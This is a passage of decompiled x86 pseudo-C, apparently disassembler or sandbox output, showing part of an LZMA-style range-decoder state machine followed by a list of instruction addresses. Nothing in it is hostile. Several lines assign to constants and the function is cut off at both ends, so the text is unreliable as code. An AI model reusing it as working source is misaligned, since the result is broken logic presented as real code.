                                                                        												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t334;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												__eax =  *(__ebp - 0x2c);
                                                                        												goto L101;
                                                                        											case 0xd:
                                                                        												L37:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0xd;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t122 = __ebp - 0x70;
                                                                        												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t122;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												L39:
                                                                        												__eax =  *(__ebp - 0x40);
                                                                        												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                        													goto L48;
                                                                        												}
                                                                        												__eflags = __ebx - 0x100;
                                                                        												if(__ebx >= 0x100) {
                                                                        													goto L54;
                                                                        												}
                                                                        												L41:
                                                                        												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                        												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                        												__ecx =  *(__ebp - 0x58);
                                                                        												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                        												 *(__ebp - 0x48) = __eax;
                                                                        												__eax = __eax + 1;
                                                                        												__eax = __eax << 8;
                                                                        												__eax = __eax + __ebx;
                                                                        												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        												__ax =  *__esi;
                                                                        												 *(__ebp - 0x54) = __esi;
                                                                        												__edx = __ax & 0x0000ffff;
                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        													__cx = __ax;
                                                                        													 *(__ebp - 0x40) = 1;
                                                                        													__cx = __ax >> 5;
                                                                        													__eflags = __eax;
                                                                        													__ebx = __ebx + __ebx + 1;
                                                                        													 *__esi = __ax;
                                                                        												} else {
                                                                        													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                        													0x800 = 0x800 - __edx;
                                                                        													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                        													__ebx = __ebx + __ebx;
                                                                        													 *__esi = __cx;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        													goto L39;
                                                                        												} else {
                                                                        													goto L37;
                                                                        												}
                                                                        											case 0xe:
                                                                        												L46:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0xe;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t156 = __ebp - 0x70;
                                                                        												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t156;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												while(1) {
                                                                        													L48:
                                                                        													__eflags = __ebx - 0x100;
                                                                        													if(__ebx >= 0x100) {
                                                                        														break;
                                                                        													}
                                                                        													__eax =  *(__ebp - 0x58);
                                                                        													__edx = __ebx + __ebx;
                                                                        													__ecx =  *(__ebp - 0x10);
                                                                        													__esi = __edx + __eax;
                                                                        													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        													__ax =  *__esi;
                                                                        													 *(__ebp - 0x54) = __esi;
                                                                        													__edi = __ax & 0x0000ffff;
                                                                        													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        													if( *(__ebp - 0xc) >= __ecx) {
                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        														__cx = __ax;
                                                                        														_t170 = __edx + 1; // 0x1
                                                                        														__ebx = _t170;
                                                                        														__cx = __ax >> 5;
                                                                        														__eflags = __eax;
                                                                        														 *__esi = __ax;
                                                                        													} else {
                                                                        														 *(__ebp - 0x10) = __ecx;
                                                                        														0x800 = 0x800 - __edi;
                                                                        														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        														__ebx = __ebx + __ebx;
                                                                        														 *__esi = __cx;
                                                                        													}
                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        														continue;
                                                                        													} else {
                                                                        														goto L46;
                                                                        													}
                                                                        												}
                                                                        												L54:
                                                                        												_t173 = __ebp - 0x34;
                                                                        												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                        												__eflags =  *_t173;
                                                                        												goto L55;
                                                                        											case 0xf:
                                                                        												L58:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0xf;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t203 = __ebp - 0x70;
                                                                        												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t203;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												L60:
                                                                        												__eflags = __ebx - 0x100;
                                                                        												if(__ebx >= 0x100) {
                                                                        													L55:
                                                                        													__al =  *(__ebp - 0x44);
                                                                        													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                        													goto L56;
                                                                        												}
                                                                        												L61:
                                                                        												__eax =  *(__ebp - 0x58);
                                                                        												__edx = __ebx + __ebx;
                                                                        												__ecx =  *(__ebp - 0x10);
                                                                        												__esi = __edx + __eax;
                                                                        												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                        												__ax =  *__esi;
                                                                        												 *(__ebp - 0x54) = __esi;
                                                                        												__edi = __ax & 0x0000ffff;
                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        													__cx = __ax;
                                                                        													_t217 = __edx + 1; // 0x1
                                                                        													__ebx = _t217;
                                                                        													__cx = __ax >> 5;
                                                                        													__eflags = __eax;
                                                                        													 *__esi = __ax;
                                                                        												} else {
                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                        													0x800 = 0x800 - __edi;
                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        													__ebx = __ebx + __ebx;
                                                                        													 *__esi = __cx;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        												 *(__ebp - 0x44) = __ebx;
                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        													goto L60;
                                                                        												} else {
                                                                        													goto L58;
                                                                        												}
                                                                        											case 0x10:
                                                                        												L109:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0x10;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t365 = __ebp - 0x70;
                                                                        												 *_t365 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t365;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												goto L111;
                                                                        											case 0x11:
                                                                        												L68:
                                                                        												_t614 =  *(_t621 - 0x58);
                                                                        												 *(_t621 - 0x84) = 0x12;
                                                                        												while(1) {
                                                                        													L132:
                                                                        													 *(_t621 - 0x54) = _t614;
                                                                        													goto L133;
                                                                        												}
                                                                        											case 0x12:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													__eax =  *(__ebp - 0x58);
                                                                        													 *(__ebp - 0x84) = 0x13;
                                                                        													__esi =  *(__ebp - 0x58) + 2;
                                                                        													while(1) {
                                                                        														L132:
                                                                        														 *(_t621 - 0x54) = _t614;
                                                                        														goto L133;
                                                                        													}
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x4c);
                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                        												__ecx =  *(__ebp - 0x58);
                                                                        												__eax =  *(__ebp - 0x4c) << 4;
                                                                        												__eflags = __eax;
                                                                        												__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                        												goto L130;
                                                                        											case 0x13:
                                                                        												__eflags =  *(__ebp - 0x40);
                                                                        												if( *(__ebp - 0x40) != 0) {
                                                                        													_t469 = __ebp - 0x58;
                                                                        													 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                        													__eflags =  *_t469;
                                                                        													 *(__ebp - 0x30) = 0x10;
                                                                        													 *(__ebp - 0x40) = 8;
                                                                        													L144:
                                                                        													 *(__ebp - 0x7c) = 0x14;
                                                                        													goto L145;
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x4c);
                                                                        												__ecx =  *(__ebp - 0x58);
                                                                        												__eax =  *(__ebp - 0x4c) << 4;
                                                                        												 *(__ebp - 0x30) = 8;
                                                                        												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                        												L130:
                                                                        												 *(__ebp - 0x58) = __eax;
                                                                        												 *(__ebp - 0x40) = 3;
                                                                        												goto L144;
                                                                        											case 0x14:
                                                                        												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                        												__eax =  *(__ebp - 0x80);
                                                                        												 *(_t621 - 0x88) = _t542;
                                                                        												goto L1;
                                                                        											case 0x15:
                                                                        												__eax = 0;
                                                                        												__eflags =  *(__ebp - 0x38) - 7;
                                                                        												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                        												__al = __al & 0x000000fd;
                                                                        												__eax = (__eflags >= 0) - 1 + 0xb;
                                                                        												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                        												goto L120;
                                                                        											case 0x16:
                                                                        												__eax =  *(__ebp - 0x30);
                                                                        												__eflags = __eax - 4;
                                                                        												if(__eax >= 4) {
                                                                        													_push(3);
                                                                        													_pop(__eax);
                                                                        												}
                                                                        												__ecx =  *(__ebp - 4);
                                                                        												 *(__ebp - 0x40) = 6;
                                                                        												__eax = __eax << 7;
                                                                        												 *(__ebp - 0x7c) = 0x19;
                                                                        												 *(__ebp - 0x58) = __eax;
                                                                        												goto L145;
                                                                        											case 0x17:
                                                                        												L145:
                                                                        												__eax =  *(__ebp - 0x40);
                                                                        												 *(__ebp - 0x50) = 1;
                                                                        												 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                        												goto L149;
                                                                        											case 0x18:
                                                                        												L146:
                                                                        												__eflags =  *(__ebp - 0x6c);
                                                                        												if( *(__ebp - 0x6c) == 0) {
                                                                        													 *(__ebp - 0x88) = 0x18;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x70);
                                                                        												__eax =  *(__ebp - 0xc);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                        												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                        												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												_t484 = __ebp - 0x70;
                                                                        												 *_t484 =  *(__ebp - 0x70) + 1;
                                                                        												__eflags =  *_t484;
                                                                        												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                        												L148:
                                                                        												_t487 = __ebp - 0x48;
                                                                        												 *_t487 =  *(__ebp - 0x48) - 1;
                                                                        												__eflags =  *_t487;
                                                                        												L149:
                                                                        												__eflags =  *(__ebp - 0x48);
                                                                        												if( *(__ebp - 0x48) <= 0) {
                                                                        													__ecx =  *(__ebp - 0x40);
                                                                        													__ebx =  *(__ebp - 0x50);
                                                                        													0 = 1;
                                                                        													__eax = 1 << __cl;
                                                                        													__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                        													__eax =  *(__ebp - 0x7c);
                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                        													while(1) {
                                                                        														 *(_t621 - 0x88) = _t542;
                                                                        														goto L1;
                                                                        													}
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x50);
                                                                        												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        												__eax =  *(__ebp - 0x58);
                                                                        												__esi = __edx + __eax;
                                                                        												 *(__ebp - 0x54) = __esi;
                                                                        												__ax =  *__esi;
                                                                        												__edi = __ax & 0x0000ffff;
                                                                        												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                        												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                        												if( *(__ebp - 0xc) >= __ecx) {
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                        													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                        													__cx = __ax;
                                                                        													__cx = __ax >> 5;
                                                                        													__eax = __eax - __ecx;
                                                                        													__edx = __edx + 1;
                                                                        													__eflags = __edx;
                                                                        													 *__esi = __ax;
                                                                        													 *(__ebp - 0x50) = __edx;
                                                                        												} else {
                                                                        													 *(__ebp - 0x10) = __ecx;
                                                                        													0x800 = 0x800 - __edi;
                                                                        													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                        													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                        													 *__esi = __cx;
                                                                        												}
                                                                        												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        													goto L148;
                                                                        												} else {
                                                                        													goto L146;
                                                                        												}
                                                                        											case 0x19:
                                                                        												__eflags = __ebx - 4;
                                                                        												if(__ebx < 4) {
                                                                        													 *(__ebp - 0x2c) = __ebx;
                                                                        													L119:
                                                                        													_t393 = __ebp - 0x2c;
                                                                        													 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                        													__eflags =  *_t393;
                                                                        													L120:
                                                                        													__eax =  *(__ebp - 0x2c);
                                                                        													__eflags = __eax;
                                                                        													if(__eax == 0) {
                                                                        														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                        														goto L170;
                                                                        													}
                                                                        													__eflags = __eax -  *(__ebp - 0x60);
                                                                        													if(__eax >  *(__ebp - 0x60)) {
                                                                        														goto L171;
                                                                        													}
                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                        													__eax =  *(__ebp - 0x30);
                                                                        													_t400 = __ebp - 0x60;
                                                                        													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                        													__eflags =  *_t400;
                                                                        													goto L123;
                                                                        												}
                                                                        												__ecx = __ebx;
                                                                        												__eax = __ebx;
                                                                        												__ecx = __ebx >> 1;
                                                                        												__eax = __ebx & 0x00000001;
                                                                        												__ecx = (__ebx >> 1) - 1;
                                                                        												__al = __al | 0x00000002;
                                                                        												__eax = (__ebx & 0x00000001) << __cl;
                                                                        												__eflags = __ebx - 0xe;
                                                                        												 *(__ebp - 0x2c) = __eax;
                                                                        												if(__ebx >= 0xe) {
                                                                        													__ebx = 0;
                                                                        													 *(__ebp - 0x48) = __ecx;
                                                                        													L102:
                                                                        													__eflags =  *(__ebp - 0x48);
                                                                        													if( *(__ebp - 0x48) <= 0) {
                                                                        														__eax = __eax + __ebx;
                                                                        														 *(__ebp - 0x40) = 4;
                                                                        														 *(__ebp - 0x2c) = __eax;
                                                                        														__eax =  *(__ebp - 4);
                                                                        														__eax =  *(__ebp - 4) + 0x644;
                                                                        														__eflags = __eax;
                                                                        														L108:
                                                                        														__ebx = 0;
                                                                        														 *(__ebp - 0x58) = __eax;
                                                                        														 *(__ebp - 0x50) = 1;
                                                                        														 *(__ebp - 0x44) = 0;
                                                                        														 *(__ebp - 0x48) = 0;
                                                                        														L112:
                                                                        														__eax =  *(__ebp - 0x40);
                                                                        														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                        														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                        															_t391 = __ebp - 0x2c;
                                                                        															 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                        															__eflags =  *_t391;
                                                                        															goto L119;
                                                                        														}
                                                                        														__eax =  *(__ebp - 0x50);
                                                                        														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                        														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                        														__eax =  *(__ebp - 0x58);
                                                                        														__esi = __edi + __eax;
                                                                        														 *(__ebp - 0x54) = __esi;
                                                                        														__ax =  *__esi;
                                                                        														__ecx = __ax & 0x0000ffff;
                                                                        														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                        														__eflags =  *(__ebp - 0xc) - __edx;
                                                                        														if( *(__ebp - 0xc) >= __edx) {
                                                                        															__ecx = 0;
                                                                        															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                        															__ecx = 1;
                                                                        															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                        															__ebx = 1;
                                                                        															__ecx =  *(__ebp - 0x48);
                                                                        															__ebx = 1 << __cl;
                                                                        															__ecx = 1 << __cl;
                                                                        															__ebx =  *(__ebp - 0x44);
                                                                        															__ebx =  *(__ebp - 0x44) | __ecx;
                                                                        															__cx = __ax;
                                                                        															__cx = __ax >> 5;
                                                                        															__eax = __eax - __ecx;
                                                                        															__edi = __edi + 1;
                                                                        															__eflags = __edi;
                                                                        															 *(__ebp - 0x44) = __ebx;
                                                                        															 *__esi = __ax;
                                                                        															 *(__ebp - 0x50) = __edi;
                                                                        														} else {
                                                                        															 *(__ebp - 0x10) = __edx;
                                                                        															0x800 = 0x800 - __ecx;
                                                                        															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                        															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                        															 *__esi = __dx;
                                                                        														}
                                                                        														__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        														if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        															L111:
                                                                        															_t368 = __ebp - 0x48;
                                                                        															 *_t368 =  *(__ebp - 0x48) + 1;
                                                                        															__eflags =  *_t368;
                                                                        															goto L112;
                                                                        														} else {
                                                                        															goto L109;
                                                                        														}
                                                                        													}
                                                                        													__ecx =  *(__ebp - 0xc);
                                                                        													__ebx = __ebx + __ebx;
                                                                        													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                        													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                        													 *(__ebp - 0x44) = __ebx;
                                                                        													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                        														__ecx =  *(__ebp - 0x10);
                                                                        														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                        														__ebx = __ebx | 0x00000001;
                                                                        														__eflags = __ebx;
                                                                        														 *(__ebp - 0x44) = __ebx;
                                                                        													}
                                                                        													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                        													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                        														L101:
                                                                        														_t338 = __ebp - 0x48;
                                                                        														 *_t338 =  *(__ebp - 0x48) - 1;
                                                                        														__eflags =  *_t338;
                                                                        														goto L102;
                                                                        													} else {
                                                                        														goto L99;
                                                                        													}
                                                                        												}
                                                                        												__edx =  *(__ebp - 4);
                                                                        												__eax = __eax - __ebx;
                                                                        												 *(__ebp - 0x40) = __ecx;
                                                                        												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                        												goto L108;
                                                                        											case 0x1a:
                                                                        												L56:
                                                                        												__eflags =  *(__ebp - 0x64);
                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                        													 *(__ebp - 0x88) = 0x1a;
                                                                        													goto L170;
                                                                        												}
                                                                        												__ecx =  *(__ebp - 0x68);
                                                                        												__al =  *(__ebp - 0x5c);
                                                                        												__edx =  *(__ebp - 8);
                                                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                        												 *( *(__ebp - 0x68)) = __al;
                                                                        												__ecx =  *(__ebp - 0x14);
                                                                        												 *(__ecx +  *(__ebp - 8)) = __al;
                                                                        												__eax = __ecx + 1;
                                                                        												__edx = 0;
                                                                        												_t192 = __eax %  *(__ebp - 0x74);
                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                        												__edx = _t192;
                                                                        												goto L79;
                                                                        											case 0x1b:
                                                                        												L75:
                                                                        												__eflags =  *(__ebp - 0x64);
                                                                        												if( *(__ebp - 0x64) == 0) {
                                                                        													 *(__ebp - 0x88) = 0x1b;
                                                                        													goto L170;
                                                                        												}
                                                                        												__eax =  *(__ebp - 0x14);
                                                                        												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        												__eflags = __eax -  *(__ebp - 0x74);
                                                                        												if(__eax >=  *(__ebp - 0x74)) {
                                                                        													__eax = __eax +  *(__ebp - 0x74);
                                                                        													__eflags = __eax;
                                                                        												}
                                                                        												__edx =  *(__ebp - 8);
                                                                        												__cl =  *(__eax + __edx);
                                                                        												__eax =  *(__ebp - 0x14);
                                                                        												 *(__ebp - 0x5c) = __cl;
                                                                        												 *(__eax + __edx) = __cl;
                                                                        												__eax = __eax + 1;
                                                                        												__edx = 0;
                                                                        												_t274 = __eax %  *(__ebp - 0x74);
                                                                        												__eax = __eax /  *(__ebp - 0x74);
                                                                        												__edx = _t274;
                                                                        												__eax =  *(__ebp - 0x68);
                                                                        												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                        												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        												_t283 = __ebp - 0x64;
                                                                        												 *_t283 =  *(__ebp - 0x64) - 1;
                                                                        												__eflags =  *_t283;
                                                                        												 *( *(__ebp - 0x68)) = __cl;
                                                                        												L79:
                                                                        												 *(__ebp - 0x14) = __edx;
                                                                        												goto L80;
                                                                        											case 0x1c:
                                                                        												while(1) {
                                                                        													L123:
                                                                        													__eflags =  *(__ebp - 0x64);
                                                                        													if( *(__ebp - 0x64) == 0) {
                                                                        														break;
                                                                        													}
                                                                        													__eax =  *(__ebp - 0x14);
                                                                        													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                        													__eflags = __eax -  *(__ebp - 0x74);
                                                                        													if(__eax >=  *(__ebp - 0x74)) {
                                                                        														__eax = __eax +  *(__ebp - 0x74);
                                                                        														__eflags = __eax;
                                                                        													}
                                                                        													__edx =  *(__ebp - 8);
                                                                        													__cl =  *(__eax + __edx);
                                                                        													__eax =  *(__ebp - 0x14);
                                                                        													 *(__ebp - 0x5c) = __cl;
                                                                        													 *(__eax + __edx) = __cl;
                                                                        													__eax = __eax + 1;
                                                                        													__edx = 0;
                                                                        													_t414 = __eax %  *(__ebp - 0x74);
                                                                        													__eax = __eax /  *(__ebp - 0x74);
                                                                        													__edx = _t414;
                                                                        													__eax =  *(__ebp - 0x68);
                                                                        													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                        													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                        													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                        													__eflags =  *(__ebp - 0x30);
                                                                        													 *( *(__ebp - 0x68)) = __cl;
                                                                        													 *(__ebp - 0x14) = _t414;
                                                                        													if( *(__ebp - 0x30) > 0) {
                                                                        														continue;
                                                                        													} else {
                                                                        														L80:
                                                                        														 *(__ebp - 0x88) = 2;
                                                                        														goto L1;
                                                                        													}
                                                                        												}
                                                                        												 *(__ebp - 0x88) = 0x1c;
                                                                        												goto L170;
                                                                        										}
                                                                        									}
                                                                        									L171:
                                                                        									_t544 = _t543 | 0xffffffff;
                                                                        									goto L172;
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L1;
                                                                        				}
                                                                        			}














                                                                        0x00000000
                                                                        0x00406ffe
                                                                        0x00406ffe
                                                                        0x00407002
                                                                        0x00407023
                                                                        0x0040702a
                                                                        0x00407030
                                                                        0x00407036
                                                                        0x00407048
                                                                        0x0040704e
                                                                        0x00407053
                                                                        0x00000000
                                                                        0x00407004
                                                                        0x0040700a
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073ce
                                                                        0x004073ce
                                                                        0x004073ce
                                                                        0x004073d4
                                                                        0x004073da
                                                                        0x004073e0
                                                                        0x004073fa
                                                                        0x004073fd
                                                                        0x00407403
                                                                        0x0040740e
                                                                        0x00407410
                                                                        0x004073e2
                                                                        0x004073e2
                                                                        0x004073f1
                                                                        0x004073f5
                                                                        0x004073f5
                                                                        0x0040741a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040741c
                                                                        0x00407420
                                                                        0x004075cf
                                                                        0x004075e5
                                                                        0x004075ed
                                                                        0x004075f4
                                                                        0x004075f6
                                                                        0x004075fd
                                                                        0x00407601
                                                                        0x00407601
                                                                        0x0040742c
                                                                        0x00407433
                                                                        0x0040743b
                                                                        0x0040743e
                                                                        0x00407441
                                                                        0x00407441
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00406be3
                                                                        0x00406be3
                                                                        0x00406be3
                                                                        0x00406bec
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2
                                                                        0x00000000
                                                                        0x00406bfd
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c06
                                                                        0x00406c09
                                                                        0x00406c0c
                                                                        0x00406c10
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c16
                                                                        0x00406c19
                                                                        0x00406c1b
                                                                        0x00406c1c
                                                                        0x00406c1f
                                                                        0x00406c21
                                                                        0x00406c22
                                                                        0x00406c24
                                                                        0x00406c27
                                                                        0x00406c2c
                                                                        0x00406c31
                                                                        0x00406c3a
                                                                        0x00406c4d
                                                                        0x00406c50
                                                                        0x00406c5c
                                                                        0x00406c84
                                                                        0x00406c86
                                                                        0x00406c94
                                                                        0x00406c94
                                                                        0x00406c98
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406c88
                                                                        0x00406c88
                                                                        0x00406c8b
                                                                        0x00406c8c
                                                                        0x00406c8c
                                                                        0x00000000
                                                                        0x00406c88
